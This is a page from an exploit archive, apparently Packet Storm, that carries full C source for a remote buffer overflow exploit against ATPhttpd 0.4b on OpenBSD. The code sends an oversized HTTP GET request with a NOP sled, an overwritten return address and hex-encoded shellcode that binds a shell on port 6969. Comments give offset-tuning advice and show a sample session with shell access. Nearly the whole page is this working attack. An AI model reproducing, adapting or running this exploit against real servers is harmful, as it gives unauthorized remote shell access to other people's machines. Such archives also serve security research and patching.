what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

atphttpd-smack.c

atphttpd-smack.c
Posted Dec 17, 2001
Authored by Tony Lambiris | Site sec.angrypacket.com

ATPhttpd v0.4b remote buffer overflow exploit. Tested on and against OpenBSD 2.8. Binds a shell to port 6969 which has the UID of the webserver.

tags | exploit, remote, overflow, shell
systems | openbsd
SHA-256 | 757c275efbea1d7b73f2905d9f4495bea18769bc447e4b0528d63eaf7503bca7

atphttpd-smack.c

Change Mirror Download
/* remote exploit for ATPhttpd 0.4 */
/* www: $Id: atphttpd-smack.c,v 1.2 2001/12/16 22:00:57 dmuz Exp $ */
/* $_Id: atphttpd-smack.c,v 1.27 2001/12/15 08:28:24 methodic Exp $ */

/* Another 31336++ codez from AngryPacket */

/*
* "Tamer Sahin" <ts@securityoffice.net> posted to BUGTRAQ that there
* was a DoS condition in ATPhttpd on 13 Dec 2001. I downloaded the
* source for the hell of it. Ran ye old perl Ax4000|nc and did some
* gdb'n and noticed that it said the return address was 0x41414141.
* Well that speaks for itself...
*
* - dmuz@angrypacket.com
*/

/*
* developed and tested against OpenBSD. exploit creates a port-binding
* shell on the remote machine on port 6969 with the uid of the server.
* try offsets between 5000 and -5000 with increments of 100. -200 worked
* like a charm for me.
*
* ./atphttpd-smack -h 127.0.0.1 -p 80 -o -200
* [methodic@vulnhost] [~]$ nc localhost 6969
* whoami
* methodic
* id
* uid=1009(methodic) gid=1009(methodic)
* ^C punt!
*
* mad thankz to vegac who helped me with a lame bug i was over looking
*/

/* this exploit code by methodic with a little from dmuz */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>

/* 701 A's to own the EIP */
#define LEN 900
#define NOP 0x90

/* port binding shellcode (6969/tcp) by noir */
long shellcode[]=
{
0x4151c931,0x51514151,0x61b0c031,0x078980cd,
0x4f88c931,0x0547c604,0x084f8902,0x0647c766,
0x106a391b,0x5004478d,0x5050078b,0x68b0c031,
0x016a80cd,0x5050078b,0x6ab0c031,0xc93180cd,
0x078b5151,0xc0315050,0x80cd1eb0,0xc9310789,
0x50078b51,0xb0c03150,0x4180cd5a,0x7503f983,
0x5b23ebef,0xc9311f89,0x89074b88,0x8d51044f,
0x078b5007,0xc0315050,0x80cd3bb0,0x5151c931,
0x01b0c031,0xd8e880cd,0x2fffffff,0x2f6e6962,
0x90416873
};

unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {

int sockfd=0, port=0, offset=0;
int ch, i;
long retaddr;
char *host=NULL, http_request[LEN+20];
char *payload, *ptr=(char *)&shellcode;
struct sockaddr_in s;

while ((ch = getopt(argc, argv, "h:p:o:")) != -1) {
switch (ch) {
case 'h':
host = optarg;
break;
case 'p':
port = atoi(optarg);
break;
case 'o':
offset = atol(optarg);
break;
}
}

printf(">> atphttpd 0.4b exploit, written by angrypacket security crew\n");
if(!host) {
usage(argv[0]);
}
if(!port) {
port = 80;
}

/* setup socket structure */
bzero(&s, sizeof(s));
s.sin_family = AF_INET;
s.sin_port = htons(port);
s.sin_addr.s_addr = inet_addr(host);

if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror(" + socket");
exit(1);
}

if(connect(sockfd, (struct sockaddr *)&s, sizeof(s)) == -1) {
perror(" + connect");
exit(1);
}

/* build c0dez.. */
payload = (char *)malloc(LEN);

retaddr = get_sp() - offset;
printf(" + building payload [retaddr: 0x%lx] [offset: %ld]\n", retaddr, offset);

/* fill the buffer with return addr's */
for(i = 0; i < LEN; i += 4)
*(long *)&payload[i] = retaddr;

/* fill in some NOPs */
for(i = 0; i < ((LEN/2) - 100); i++)
*(payload + i) = NOP;

/* copy the shellcode and terminate the payload string */
memcpy(payload + i, ptr, strlen(ptr));
payload[LEN-1] = '\0';

bzero(&http_request, LEN+20);
strcpy(http_request, "GET ");
strcat(http_request, payload);
strcat(http_request, " HTTP/1.0\r\n\r\n");
free(payload);

printf(" + sending payload to <%s> on port [%d].. ", host, port);
send(sockfd, http_request, strlen(http_request), 0);
printf("done\n");
close(sockfd);

printf(" + now connect to port 6969 on <%s> (be good!)\n", host);
printf(">> visit https://sec.angrypacket.com for more security tools\n");

return(0);

}

int usage(char *progname) {
fprintf(stderr, "usage: %s -h <target ip> -p <target port> -o <offset>\n", progname);
exit(0);
}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close